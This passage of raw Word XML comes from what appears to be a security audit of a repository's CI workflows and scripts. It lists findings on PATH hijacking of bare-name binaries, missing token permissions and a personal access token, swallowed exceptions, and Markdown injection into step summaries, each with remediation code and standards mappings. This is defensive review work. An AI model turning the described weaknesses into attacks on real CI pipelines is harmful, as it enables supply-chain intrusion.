      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are launched by bare name (Bandit B607), resolved via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. On a developer workstation or CI runner whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains an attacker-writable directory ahead of the real binary, a planted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs instead. All invocations use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>list form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and file arguments are prefixed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>repo_root/detections/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (they never begin with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), so there is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no shell-command injection and no argument-injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here — the residual risk is PATH ordering only. This is primarily a local-dev hook; CI impact is bounded by runner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hygiene. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: requires attacker control of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/a writable PATH dir. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable in a clean environment / defense-in-depth.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: resolve with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shutil.which()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and validate, or require an absolute path; keep list-form calls. Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import shutil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>exe = shutil.which('yamlfmt')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if not exe:</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print("ERROR: yamlfmt not found on PATH"); return 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>subprocess.run([exe, '--version'], capture_output=True, text=True, check=False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-426; CWE-427. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-7 Least Functionality, SI-7 Software, Firmware, and Information Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.19 Installation of software on operational systems. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-13 — Missing top-level permissions: blocks and use of a personal access token where a scoped token would do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.5). Exploitability: Least-privilege hardening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/appinspect.yml, .github/workflows/build.yml, .github/workflows/build-response-templates.yml, .github/workflows/unit-testing.yml, .github/workflows/yaml-validation.yml, .github/workflows/datasource-dependabot.yml:17,48, .github/workflows/update_splunk_tas.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Most workflows declare no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, inheriting the repository/org default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scope (which may be read/write depending on org settings). Jobs that only build/lint should pin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions: {contents: read}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses a personal access token (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DATA_SOURCES_DEPENDABOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) rather than the job </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; a PAT is broader and longer-lived — if leaked it is more damaging than a scoped job token. These are scheduled (trusted) jobs, so the exposure is least-privilege hardening rather than an exploit. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: add explicit minimal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to every workflow; prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github.token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull-requests:write</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contents:write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_nist_ai_rmf_detection_map.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> already does) over a PAT, and if a PAT is required use a fine-grained token scoped to this repo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-250 Execution with Unnecessary Privileges; CWE-272. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design, A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-6 Least Privilege, CM-7 Least Functionality. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-09 — Bare except: and broad exception handling swallow errors (validate_yaml.py, ta_update.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.3). Exploitability: Robustness weakness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scripts/validate_yaml.py:119; .github/workflows/ta_update.py:472,499-501</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>validate_yaml.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> line 119 silently discards any exception while resolving the repo root, so a git failure is hidden and path handling may proceed with wrong assumptions. In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the bare except at 472 treats *any* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>head_object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> error as "file missing" (could mask auth/permission errors and trigger needless re-upload), and 499-501 marks a UID processed on error — a failed download is silently skipped, so a TA may never be updated without a clear signal. Robustness / error-handling weaknesses, not directly exploitable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: catch specific exceptions and log context:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># validate_yaml.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except (subprocess.CalledProcessError, FileNotFoundError):</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pass  # git not available -&gt; fall back to cwd (intended)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># ta_update.py head_object</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except botocore.exceptions.ClientError as e:</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if e.response["Error"]["Code"] not in ("404", "NoSuchKey"):</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raise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-396; CWE-390 Detection of Error Condition Without Action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.15 Logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-10 — PR-controlled detection name/exception rendered unescaped into the GitHub step summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Conditionally exploitable (content spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/format_test_results.py:36-46; .github/workflows/unit-testing.yml:100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>39:  name = (detection.get('name') or 'N/A').strip()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>42:  exception = (test.get('exception') or 'N/A')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>44:  print(f"{name:&lt;80} | 🔴 {status:&lt;6}  | {test_type:&lt;10} | {exception:&lt;50}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>summary.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is produced from PR-authored detection content, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are attacker-influenced on a fork PR. They are printed verbatim into the GitHub Step Summary (Markdown). A crafted detection name/exception can inject Markdown/HTML-ish content (links, images, formatting) into the job summary that maintainers read. No code execution — step summaries are sanitized Markdown — so impact is cosmetic/spoofing of the results table. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.safe_load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used correctly (line 23). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fork PR → detection name/exception → step summary Markdown. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable as content spoofing only.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: escape/neutralize before emitting (strip newlines/backticks/pipes, or wrap in code spans), e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>name = name.replace('|','\\|').replace('\n',' ')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and render exceptions inside a fenced block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-117; CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-15 — Unbounded $ref recursion in validate_response_templates.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.3). Exploitability: Robustness (repo-controlled input).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/response_templates/validate_response_templates.py:47-61</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
